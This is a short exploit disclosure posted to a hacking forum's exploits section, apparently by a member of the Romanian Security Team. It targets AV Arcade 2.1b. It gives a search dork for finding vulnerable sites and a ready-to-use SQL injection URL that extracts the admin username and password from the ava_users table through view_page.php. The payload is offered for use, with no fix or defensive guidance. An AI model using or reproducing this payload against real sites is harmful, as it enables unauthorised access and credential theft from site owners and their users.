Jump to content
kw3rln

[RST]AV Arcade 2.1b (view_page.php) Remote SQL Injection

By kw3rln, in Exploituri

Recommended Posts

kw3rln Newbie

kw3rln

Posted
Posted

AV Arcade 2.1b (view_page.php) Remote SQL Injection

Web: AV Arcade 2.1b

Site : www.avscripts.net

Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]

Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Description: SQL injection in $id of includes/view_page.php

Exploit:

index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm

//kw3rln [ http://rstzone.net ]

[EOF]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...